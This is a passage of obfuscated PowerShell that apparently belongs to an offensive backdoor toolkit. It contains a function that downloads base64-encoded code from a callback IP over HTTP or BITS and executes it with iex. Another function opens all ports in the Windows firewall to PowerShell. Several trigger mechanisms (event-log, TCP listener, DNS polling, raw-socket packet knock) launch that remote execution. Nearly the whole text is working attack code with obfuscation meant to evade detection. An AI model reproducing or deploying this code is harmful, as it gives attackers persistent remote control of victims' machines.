$5KZYIt::"S`eRv`e`RC`e`RTiFIcatEVali`DATiON`cAlLB`A`ck" = {${tr`ue}}
|
||||
${u`RL}="https://$CallbackIP$resource"
|
||||
if(-not ${s`IlenT}) {write-host "Calling home with method $method to: $url"}
|
||||
|
||||
${E`Nc} = (new-object ("{0}{2}{1}"-f'net.','client','web'))."DO`WnlOaD`St`Ring"(${u`RL})
|
||||
}
|
||||
|
||||
elseif (${me`TH`oD} -eq 2)
|
||||
{
|
||||
${u`RL}="http://$CallbackIP$resource"
|
||||
if(-not ${s`iL`EnT}) { write-host "Calling home with method $method to: $url"
|
||||
write-host "BITS Temp output to: $BitsTempFile"}
|
||||
Import-Module ("{0}{1}" -f '*','bits*')
|
||||
Start-BitsTransfer ${u`RL} ${biTS`T`EM`p`FIle} -ErrorAction ("{1}{0}" -f'op','St')
|
||||
|
||||
${e`NC} = Get-Content ${biT`StEMp`FILe} -ErrorAction ("{1}{0}"-f'p','Sto')
|
||||
|
||||
|
||||
Remove-Item ${B`It`St`eMpF`iLe} -ErrorAction ("{1}{3}{2}{0}"-f 'tinue','Si','entlyCon','l')
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
if(-not ${s`I`leNt}) { write-host "Error: Improper callback method" -fore ("{1}{0}"-f 'ed','r')}
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
if (${e`Nc})
|
||||
{
|
||||
|
||||
${B} = (Gi ("{0}{1}{3}{2}"-f'VarIA','BLe:nz','p','v2A') ).vALuE::"f`RombAS`E64`stR`ING"(${E`NC})
|
||||
${D`Ec} = ( gI ("VArIA"+"ble"+":T1o5")).VaLuE::"U`Tf8"."gETStr`i`NG"(${b})
|
||||
|
||||
|
||||
iex ${D`EC}
|
||||
}
|
||||
else
|
||||
{
|
||||
if(-not ${s`ILE`Nt}) { write-host "Error: No Data Downloaded" -fore ("{0}{1}"-f'r','ed')}
|
||||
return 0
|
||||
}
|
||||
}
|
||||
catch [System.Net.WebException]{
|
||||
if(-not ${sIl`Ent}) { write-host "Error: Network Callback failed" -fore ("{0}{1}" -f'r','ed')}
|
||||
return 0
|
||||
}
|
||||
catch [System.FormatException]{
|
||||
if(-not ${s`IlE`NT}) { write-host "Error: Base64 Format Problem" -fore ("{1}{0}" -f 'ed','r')}
|
||||
return 0
|
||||
}
|
||||
catch [System.Exception]{
|
||||
if(-not ${S`ILEnt}) { write-host "Error: Uknown problem during transfer" -fore ("{0}{1}" -f 'r','ed')}
|
||||
|
||||
return 0
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
if(-not ${sile`NT}) { write-host "No host specified for the phone home :(" -fore ("{1}{0}"-f'ed','r')}
|
||||
return 0
|
||||
}
|
||||
|
||||
return 1
|
||||
}
|
||||
|
||||
function Ad`D-PS`FIrE`wA`LLru`Les
|
||||
{
|
||||
|
||||
Param(
|
||||
[Parameter(MaNDaToRY=${FA`LsE},pOsITion=1)]
|
||||
[string]${ruL`en`Ame}="Windows Powershell",
|
||||
[Parameter(maNDAtorY=${F`A`lSe},PoSItioN=2)]
|
||||
[string]${e`xE`PATH}="C:\windows\system32\windowspowershell\v1.0\powershell.exe",
|
||||
[Parameter(maNdatOry=${fAL`SE},poSitIon=3)]
|
||||
[string]${P`oRtS}="1-65000"
|
||||
)
|
||||
|
||||
If (-NOT ([Security.Principal.WindowsPrincipal] (GeT-vArIAblE ("zN"+"U") -ValueO )::"GEtCu`RR`eNt"())."IS`inR`OLe"([Security.Principal.WindowsBuiltInRole] "Administrator"))
|
||||
{
|
||||
Write-Host "This command requires Admin :(... get to work! "
|
||||
Return
|
||||
}
|
||||
|
||||
|
||||
${fw} = New-Object -ComObject ("{2}{1}{3}{0}"-f'2','cfg.fwp','hnet','olicy')
|
||||
${R`ULE} = New-Object -ComObject ("{2}{1}{3}{0}" -f 'e','NetCf','H','g.FWRul')
|
||||
${R`ulE}."n`AME" = ${Rul`E`Na`ME}
|
||||
${R`ULE}."apP`LICAt`I`Onna`Me"=${e`XEPA`TH}
|
||||
${RU`Le}."p`RO`TOcOL" = 6
|
||||
${rU`LE}."loC`A`LPOrTS" = ${p`oRtS}
|
||||
${ru`LE}."dI`ReCTIOn" = 2
|
||||
${Ru`Le}."E`NA`BlED"=${t`RuE}
|
||||
${R`Ule}."g`Ro`upinG"="@firewallapi.dll,-23255"
|
||||
${ru`LE}."pro`FiL`ES" = 7
|
||||
${R`uLe}."A`cTiON"=1
|
||||
${r`uLe}."EDGetRA`V`E`RSAl"=${f`AlSE}
|
||||
${fw}."r`ulES"."a`Dd"(${ru`lE})
|
||||
|
||||
|
||||
${r`ULe} = New-Object -ComObject ("{3}{0}{2}{1}"-f '.FWR','le','u','HNetCfg')
|
||||
${rU`Le}."Na`Me" = ${RulE`NAME}
|
||||
${Ru`Le}."APPLICa`Tio`NN`A`me"=${E`x`EpAth}
|
||||
${rU`LE}."p`RoTOcoL" = 17
|
||||
${r`ule}."LoCAL`po`RTS" = ${P`orTs}
|
||||
${rU`le}."DiRe`cTI`ON" = 2
|
||||
${RU`le}."en`AblEd"=${tR`uE}
|
||||
${R`uLE}."GroupI`Ng"="@firewallapi.dll,-23255"
|
||||
${R`uLe}."p`ROfi`LEs" = 7
|
||||
${R`ULe}."aCt`i`oN"=1
|
||||
${Ru`Le}."EDgeTrAVE`R`saL"=${f`A`lse}
|
||||
${Fw}."Rul`es"."a`dd"(${r`uLE})
|
||||
|
||||
|
||||
${ru`LE} = New-Object -ComObject ("{1}{0}{2}{3}"-f'fg.F','HNetC','WRu','le')
|
||||
${rU`Le}."NA`mE" = ${Ru`le`NAme}
|
||||
${R`ULe}."a`ppLICationNa`ME"=${E`XepAth}
|
||||
${Ru`LE}."P`R`otOcOl" = 6
|
||||
${R`UlE}."L`O`caLporTS" = ${Por`Ts}
|
||||
${R`ulE}."d`I`REcTiOn" = 1
|
||||
${ru`lE}."ENA`BL`ED"=${tr`UE}
|
||||
${r`UlE}."gro`uPI`Ng"="@firewallapi.dll,-23255"
|
||||
${r`uLE}."Pr`O`FILEs" = 7
|
||||
${r`Ule}."A`C`TiON"=1
|
||||
${ru`lE}."EDgE`TRAV`ERSaL"=${fA`lsE}
|
||||
${F`w}."RU`les"."A`dd"(${RU`lE})
|
||||
|
||||
|
||||
${r`UlE} = New-Object -ComObject ("{0}{1}{2}{3}" -f 'H','NetCfg','.FW','Rule')
|
||||
${r`uLE}."n`AMe" = ${ruleNa`me}
|
||||
${Ru`le}."APp`LicaT`I`oN`NamE"=${ExePa`TH}
|
||||
${rU`Le}."P`Rot`OCol" = 17
|
||||
${RU`Le}."Loc`Alp`ORTs" = ${poR`Ts}
|
||||
${r`ulE}."DIRectI`on" = 1
|
||||
${r`ulE}."en`A`BLeD"=${t`Rue}
|
||||
${RU`Le}."Gr`oUP`iNG"="@firewallapi.dll,-23255"
|
||||
${r`UlE}."PrO`F`ileS" = 7
|
||||
${r`uLE}."A`CTI`ON"=1
|
||||
${R`ule}."Ed`gET`RaV`eRsaL"=${F`ALSe}
|
||||
${F`W}."r`uLEs"."A`Dd"(${R`ule})
|
||||
|
||||
}
|
||||
|
||||
function InVOk`e`-EVeNTLoop
|
||||
{
|
||||
|
||||
Param(
|
||||
[Parameter(mANdAtOry=${T`RUE},POsiTion=1)]
|
||||
[string]${cAlLBa`Ck`Ip},
|
||||
[Parameter(MaNdAtoRY=${fA`lSE},PosITion=2)]
|
||||
[string]${tRI`GG`ER}="SIXDUB",
|
||||
[Parameter(MAnDaTORy=${F`AL`SE},PoSITIOn=3)]
|
||||
[int]${tiM`EoUt}=0,
|
||||
[Parameter(maNDatOry=${fA`LSE},PosiTiON=4)]
|
||||
[int] ${s`lEEP}=1
|
||||
)
|
||||
|
||||
If (-NOT ([Security.Principal.WindowsPrincipal] ( vARIABLe ('z'+'NU') -vALUEONl)::"gEtc`ur`ReNT"())."IsiN`RoLE"([Security.Principal.WindowsBuiltInRole] "Administrator"))
|
||||
{
|
||||
Write-Host "This backdoor requires Admin :(... get to work! "
|
||||
Return
|
||||
}
|
||||
|
||||
write-host "Timeout: $Timeout"
|
||||
write-host "Trigger: $Trigger"
|
||||
write-host "CallbackIP: $CallbackIP"
|
||||
write-host
|
||||
write-host "Starting backdoor..."
|
||||
|
||||
|
||||
${rUN`Ni`NG}=${t`RUE}
|
||||
${mAT`ch} =""
|
||||
${s`TArt`TImE} = get-date
|
||||
while(${runn`i`Ng})
|
||||
{
|
||||
|
||||
if (${timE`ouT} -ne 0 -and ($( ( vaRIAble ('I6S5n'+'r') ).VALuE::"N`OW") -gt ${st`A`RTtI`mE}."aDDs`ECO`NDs"(${ti`MEO`ut})))
|
||||
{
|
||||
${rUn`N`inG}=${FA`lSE}
|
||||
}
|
||||
|
||||
${D} = Get-Date
|
||||
${n`eW`EVEnTs} = Get-WinEvent -FilterHashtable @{"l`og`NAMe"='Security'; "ST`ArTT`IME"=${D}."aDDSecO`N`DS"(-${Sl`eEp})} -ErrorAction ("{2}{1}{0}"-f'ntinue','Co','Silently') | fl ("{1}{2}{0}" -f'e','M','essag') | Out-String
|
||||
|
||||
|
||||
if (${nEw`even`TS} -match ${Tri`Gg`eR})
|
||||
{
|
||||
${runN`i`NG}=${FA`lSE}
|
||||
${MAt`Ch} = ${C`Al`lbA`ckIP}
|
||||
write-host "Match: $match"
|
||||
}
|
||||
sleep -s ${Sl`E`EP}
|
||||
}
|
||||
if(${m`Atch})
|
||||
{
|
||||
${suc`c`ESS} = Invoke-CallbackIEX ${MA`T`Ch}
|
||||
}
|
||||
}
|
||||
|
||||
function iNvo`KE`-pORTB`i`ND
|
||||
{
|
||||
|
||||
Param(
|
||||
[Parameter(MANdatory=${f`AlsE},PoSiTion=1)]
|
||||
[string]${Cal`L`BAckiP},
|
||||
[Parameter(maNDaTOrY=${fA`lse},pOSItIon=2)]
|
||||
[string]${L`ocalIP},
|
||||
[Parameter(mANDatorY=${f`ALSe},POsitION=3)]
|
||||
[int]${P`OrT}=4444,
|
||||
[Parameter(maNdAToRy=${F`AlsE},pOSiTIoN=4)]
|
||||
[string]${t`R`iGgEr}="QAZWSX123",
|
||||
[Parameter(MAnDAtoRY=${FA`LSE},POSiTion=5)]
|
||||
[int]${TIM`E`ouT}=0
|
||||
)
|
||||
|
||||
|
||||
if (-not ${LOc`A`lIP})
|
||||
{
|
||||
route ("{1}{0}"-f'int','pr') ('0*') | % {
|
||||
if (${_} -match "\s{2,}0\.0\.0\.0") {
|
||||
${N`ulL},${NU`ll},${N`ulL},${L`oCALIP},${n`uLl} = (VARiABle ('Q8w'+'Gpc') -VaLUeoNL )::"REp`LA`cE"(${_}."trI`MSTa`RT"(" "),"\s{2,}",",")."sPl`it"(",")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
write-host "!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!"
|
||||
write-host "Timeout: $Timeout"
|
||||
write-host "Port: $Port"
|
||||
write-host "Trigger: $Trigger"
|
||||
write-host "Using IPv4 Address: $LocalIP"
|
||||
write-host "CallbackIP: $CallbackIP"
|
||||
write-host
|
||||
write-host "Starting backdoor..."
|
||||
try{
|
||||
|
||||
|
||||
${iPeNd`POi`Nt} = new-object ("{2}{1}{0}{5}{4}{3}" -f't.ip','m.ne','syste','t','in','endpo')([net.ipaddress]"$localIP",${P`Ort})
|
||||
${li`sTE`NEr} = new-object ("{0}{2}{7}{4}{6}{8}{1}{5}{3}" -f 'Sys','n','tem.','r','ock','e','ets.TcpLi','Net.S','ste') ${i`p`En`DPoinT}
|
||||
${L`Isten`er}."St`Art"()
|
||||
|
||||
|
||||
${RU`N`NinG}=${tr`Ue}
|
||||
${M`AtCH} =""
|
||||
${sta`R`TTi`ME} = get-date
|
||||
while(${RU`Nn`inG})
|
||||
{
|
||||
|
||||
if (${T`IMEO`ut} -ne 0 -and ($( ( Gi ("{2}{0}{3}{1}"-f 'RiaBlE','5NR','VA',':I6S') ).VALue::"N`ow") -gt ${St`AR`TTIME}."Ad`d`sECoNds"(${Ti`M`eOuT})))
|
||||
{
|
||||
${Ru`NN`inG}=${Fa`L`se}
|
||||
}
|
||||
|
||||
|
||||
if(${l`ISTE`NER}."Pe`Nd`Ing"())
|
||||
{
|
||||
|
||||
${cL`I`EnT} = ${liSt`EN`Er}."accE`PTtcp`cl`IE`Nt"()
|
||||
write-host "Client Connected!"
|
||||
${S`TR`eam} = ${cl`IENT}."Ge`Tst`REAm"()
|
||||
${REAd`ER} = new-object ("{3}{0}{4}{2}{1}" -f 'IO.','eader','reamR','System.','St') ${st`REAm}
|
||||
|
||||
|
||||
${Li`NE} = ${RE`AD`Er}."reA`D`Line"()
|
||||
|
||||
|
||||
if (${LI`Ne} -eq ${tRIG`G`Er})
|
||||
{
|
||||
${ru`Nni`Ng}=${FA`lSE}
|
||||
${M`AT`CH} = ([system.net.ipendpoint] ${C`LI`enT}."cL`ieNt"."rEmotE`enDP`O`i`Nt")."aDD`R`ESS"."tOsTr`ING"()
|
||||
write-host "MATCH: $match"
|
||||
}
|
||||
|
||||
|
||||
${reaD`eR}."dI`SpoSe"()
|
||||
${ST`R`eAM}."dISPO`SE"()
|
||||
${cli`E`NT}."c`LosE"()
|
||||
write-host "Client Disconnected"
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
write-host "Stopping Socket"
|
||||
${l`ISTenEr}."s`TOp"()
|
||||
if(${mA`TCh})
|
||||
{
|
||||
if(${CA`lLb`A`Ckip})
|
||||
{
|
||||
${Suc`CesS} = Invoke-CallbackIEX ${c`AlLbA`cKIp}
|
||||
}
|
||||
else
|
||||
{
|
||||
${SuC`cE`Ss} = Invoke-CallbackIEX ${MAt`Ch}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch [System.Net.Sockets.SocketException] {
|
||||
write-host "Error: Socket Error" -fore ("{0}{1}"-f're','d')
|
||||
}
|
||||
}
|
||||
|
||||
function InVo`kE`-`DNsL`OOp
|
||||
{
|
||||
|
||||
param(
|
||||
[Parameter(mAndATOry=${FA`lse},pOsiTIOn=1)]
|
||||
[string]${C`AllBack`IP},
|
||||
[Parameter(MandATOrY=${fa`l`se},POsitioN=2)]
|
||||
[string]${HO`S`TnaMe}="yay.sixdub.net",
|
||||
[Parameter(MaNDaTOry=${fA`lSe},POsitiOn=3)]
|
||||
[string]${TrIg`G`ER}="127.0.0.1",
|
||||
[Parameter(MaNDaToRY=${F`Al`se},PoSItIOn=4)]
|
||||
[int] ${TIme`O`Ut}=0,
|
||||
[Parameter(mAnDAtory=${Fa`l`SE},PoSItioN=5)]
|
||||
[int] ${sLe`Ep}=1
|
||||
)
|
||||
|
||||
|
||||
write-host "Timeout: $Timeout"
|
||||
write-host "Sleep Time: $Sleep"
|
||||
write-host "Trigger: $Trigger"
|
||||
write-host "Using Hostname: $Hostname"
|
||||
write-host "CallbackIP: $CallbackIP"
|
||||
write-host
|
||||
write-host "Starting backdoor..."
|
||||
|
||||
|
||||
${r`UN`NinG}=${tr`ue}
|
||||
${mat`cH} =""
|
||||
${Sta`RTt`ime} = get-date
|
||||
while(${RUn`NIng})
|
||||
{
|
||||
|
||||
if (${Tim`EouT} -ne 0 -and ($( ( gET-vARIAble ("I6s5"+"Nr") ).value::"N`Ow") -gt ${Sta`R`TtiME}."aDDSec`O`Nds"(${TIM`eO`Ut})))
|
||||
{
|
||||
${R`uN`NInG}=${Fa`L`sE}
|
||||
}
|
||||
|
||||
try {
|
||||
|
||||
${I`pS} = ( Get-VArIABle ("{1}{0}"-f 'RIxE','t') -vA)::"gEtH`OsTaD`DrEsS`Es"(${HO`stN`A`ME})
|
||||
foreach (${ad`Dr} in ${I`Ps})
|
||||
{
|
||||
|
||||
|
||||
${r`Es`OL`Ved}=${a`DDR}."IpADdrESsT`Os`T`RING"
|
||||
if(${reS`OL`VEd} -ne ${tR`I`Gger})
|
||||
{
|
||||
${RuN`NIng}=${F`AL`Se}
|
||||
${mA`TcH}=${re`SOLv`Ed}
|
||||
write-host "Match: $match"
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
catch [System.Net.Sockets.SocketException]{
|
||||
|
||||
}
|
||||
|
||||
sleep -s ${s`L`eEp}
|
||||
}
|
||||
write-host "Shutting down DNS Check..."
|
||||
if(${ma`Tch})
|
||||
{
|
||||
if(${CAlLbAc`K`IP})
|
||||
{
|
||||
${su`cce`ss} = Invoke-CallbackIEX ${cA`lLBack`ip}
|
||||
}
|
||||
else
|
||||
{
|
||||
${su`ccE`sS} = Invoke-CallbackIEX ${m`ATch}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function inVok`e-P`ACKe`TkNOcK
|
||||
{
|
||||
|
||||
param(
|
||||
[Parameter(MANdaTorY=${faL`sE},pOsitIoN=1)]
|
||||
[string]${CaLL`B`Ack`iP},
|
||||
[Parameter(MANdatoRy=${f`Alse},POSiTion=2)]
|
||||
[string]${lo`cAL`iP},
|
||||
[Parameter(maNdatOrY=${f`AlSE},PoSiTIOn=3)]
|
||||
[string]${tRIgG`eR}="QAZWSX123",
|
||||
[Parameter(mAndaTORY=${fal`SE},pOsITIon=4)]
|
||||
[int]${tI`Me`OUt}=0
|
||||
)
|
||||
If (-NOT ([Security.Principal.WindowsPrincipal] ( get-VARIABle ("Zn"+"u") -vaLueONLy)::"GE`TCuRr`e`NT"())."i`sIn`RoLe"([Security.Principal.WindowsBuiltInRole] "Administrator"))
|
||||
{
|
||||
Write-Host "This backdoor requires Admin :(... get to work! "
|
||||
Return
|
||||
}
|
||||
|
||||
if (-not ${lo`caLIP})
|
||||
{
|
||||
route ("{1}{0}" -f'int','pr') ('0*') | % {
|
||||
if (${_} -match "\s{2,}0\.0\.0\.0") {
|
||||
${nU`lL},${n`ULL},${nu`Ll},${L`oC`AliP},${n`ull} = ( lS ("vaRIaBlE"+":Q8WgP"+"C") ).vALue::"re`P`lACE"(${_}."T`Ri`mStArT"(" "),"\s{2,}",",")."SP`lIt"(",")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
write-host "!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!"
|
||||
write-host "Timeout: $Timeout"
|
||||
write-host "Trigger: $Trigger"
|
||||
write-host "Using IPv4 Address: $LocalIP"
|
||||
write-host "CallbackIP: $CallbackIP"
|
||||
write-host
|
||||
write-host "Starting backdoor..."
|
||||
|
||||
|
||||
${BY`TE`IN} = new-object ("{1}{0}" -f 'te[]','by') 4
|
||||
${BY`TE`oUT} = new-object ("{2}{0}{1}" -f't','e[]','by') 4
|
||||
${by`T`edata} = new-object ("{0}{1}" -f 'byte[',']') 4096
|
||||
|
||||
${BYTE`iN}[0] = 1
|
||||
${b`YT`EIn}[1-3] = 0
|
||||
${byT`eOut}[0-3] = 0
|
||||
|
||||
|
||||
${s`OCket} = new-object ("{5}{3}{2}{6}{4}{0}{1}" -f 'kets','.socket','n','stem.','soc','sy','et.')( (DIR ("{2}{0}{3}{1}{4}"-f'lE:','fI','vaRIAb','L8','uY')).value::"iNte`R`Ne`TwoRk", (GCi ("{1}{0}{2}{3}"-f'aRIABLe:2','v','64p','VJ') ).ValUE::"r`AW", $EaCs::"Ip")
|
||||
${s`ocK`Et}."sEtSOc`ketopti`On"("IP","HeaderIncluded",${t`RUe})
|
||||
${So`CK`eT}."re`ceIve`BufFEr`sIzE" = 819200
|
||||
|
||||
|
||||
${i`pE`N`dpoint} = new-object ("{6}{2}{0}{5}{4}{1}{3}"-f'em.n','i','t','nt','ipendpo','et.','sys')([net.ipaddress]"$localIP",0)
|
||||
${S`OCkEt}."b`inD"(${i`pendP`oI`NT})
|
||||
|
||||
|
||||
[void]${s`Oc`kEt}."IocoNtr`ol"( $jmhB::"r`EceIV`eA`ll",${bYT`eiN},${B`yT`eoUt})
|
||||
|
||||
|
||||
${s`T`AR`TTiME} = get-date
|
||||
${rUN`NiNG} = ${Tr`Ue}
|
||||
${MAt`cH} = ""
|
||||
${p`Ack`Ets} = @()
|
||||
while (${r`UN`NiNg})
|
||||
{
|
||||
|
||||
if (${T`I`MeOut} -ne 0 -and ($( (GET-chIldiTEM ("{3}{0}{4}{2}{1}"-f'arIABLe:','s5NR','6','V','i') ).vaLUe::"N`OW") -gt ${St`A`R`TtimE}."a`d`dsecONDS"(${tI`MeoUT})))
|
||||
{
|
||||
${RU`Nn`INg}=${f`ALSe}
|
||||
}
|
||||
|
||||
if (-not ${S`oCkeT}."aV`AIlA`BLe")
|
||||
{
|
||||
start-sleep -milliseconds 500
|
||||
continue
|
||||
}
|
||||
|
||||
|
||||
${R`cV} = ${s`Ock`ET}."rE`Ce`IVe"(${Byt`E`DATA},0,${BYTe`d`A`Ta}."lEN`GtH", $y4HBR::"NO`NE")
|
||||
|
||||
|
||||
${meMOr`YS`Tr`eAm} = new-object ("{5}{6}{3}{1}{2}{0}{4}" -f 'mo','.M','e','O','ryStream','Syste','m.I')(${B`Y`TedatA},0,${r`cv})
|
||||
${B`InArYRE`A`Der} = new-object ("{0}{4}{1}{3}{2}"-f 'Syst','.Bi','der','naryRea','em.IO')(${mEm`o`RYstREAM})
|
||||
|
||||
|
||||
${T`RaSH} = ${B`iN`A`RYrea`DER}."rE`A`DbytEs"(12)
|
||||
|
||||
|
||||
${SO`Ur`Ceip`A`dDRess} = ${BInA`RYREa`DEr}."reA`DUin`T32"()
|
||||
${sOU`Rc`Eip`AddrEsS} = [System.Net.IPAddress]${SO`U`RceiP`ADD`REss}
|
||||
${Des`TinAtiOnIP`A`DD`RESs} = ${B`InaRYr`e`ADeR}."reAd`u`INt32"()
|
||||
${d`ESt`i`NA`TioNIPAd`Dre`SS} = [System.Net.IPAddress]${de`s`T`INAtIONIpaddR`E`ss}
|
||||
${REmai`NDerb`Y`Tes} = ${bIn`ArY`R`EAder}."R`EA`DbYTeS"(${me`M`OrysT`Re`AM}."l`En`gTH")
|
||||
|
||||
|
||||
${ASciie`N`CODIng} = new-object ("{3}{1}{4}{2}{0}" -f 'iiencoding','stem','xt.asc','sy','.te')
|
||||
${reMaINd`E`ROfPAcK`et} = ${asc`Iienc`oDing}."g`ETS`TRINg"(${remai`Nder`B`Y`Tes})
|
||||
|
||||
|
||||
${b`InarY`R`EaDEr}."c`loSe"()
|
||||
${m`eM`OryStR`E`AM}."Cl`Ose"()
|
||||
|
||||
|
||||
if (${R`EmA`IndER`OFPA`C`KEt} -match ${T`RiG`ger})
|
||||
{
|
||||
write-host "Match: " ${SourCE`iPa`D`d`ReSS}
|
||||
${r`uNNi`Ng}=${FAl`SE}
|
||||
${MAt`ch} = ${S`ourCEIpaD`d`Re`sS}
|
||||
}
|
||||
}
|
||||
|
||||
if(${MA`T`CH})
|
||||
{
|
||||
if(${cAL`lB`AcK`ip})
|
||||
{
|
||||
${S`uCC`EsS} = Invoke-CallbackIEX ${C`A`llbaCKIp}
|
||||
}
|
||||
else
|
||||
{
|
||||
${sU`Cce`ss} = Invoke-CallbackIEX ${Ma`Tch}
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
function i`N`Vok`E-CalLb`AC`KLOop
|
||||
{
|
||||
|
||||
Param(
|
||||
[Parameter(MaNdATorY=${tR`uE},PoSitIoN=1)]
|
||||
[string]${c`All`Ba`ckIP},
|
||||
[Parameter(maNDatoRY=${f`AL`se},poSItION=2)]
|
||||
[int]${tiME`O`ut}=0,
|
||||
[Parameter(ManDATORy=${Fa`LSE},poSiTion=3)]
|
||||
[int] ${Sle`Ep}=1
|
||||
)
|
||||
|
||||
|
||||
write-host "Timeout: $Timeout"
|
||||
write-host "Sleep: $Sleep"
|
||||
write-host "CallbackIP: $CallbackIP"
|
||||
write-host
|
||||
write-host "Starting backdoor..."
|
||||
|
||||
|
||||
${Runn`I`NG}=${t`RuE}
|
||||
${ma`T`ch} =""
|
||||
${s`TART`TiMe} = get-date
|
||||
while(${r`u`NNing})
|
||||
{
|
||||
|
||||
if (${Ti`MeOuT} -ne 0 -and ($( ( gET-VARIAblE ("i6S"+"5nR") -vAlue)::"n`ow") -gt ${St`ArTTi`mE}."addS`e`conds"(${TI`mE`ouT})))
|
||||
{
|
||||
${Ru`N`NiNg}=${F`Al`sE}
|
||||
}
|
||||
|
||||
${Ch`E`cksucce`ss} = Invoke-CallbackIEX ${C`ALLB`AcKiP} -Silent ${Tr`uE}
|
||||
|
||||
if(${ch`e`ckS`UCc`ESs} -eq 1)
|
||||
{
|
||||
${R`unn`inG}=${fal`Se}
|
||||
}
|
||||
|
||||
sleep -s ${s`l`EeP}
|
||||
}
|
||||
|
||||
write-host "Shutting down backdoor..."
|
||||
}
|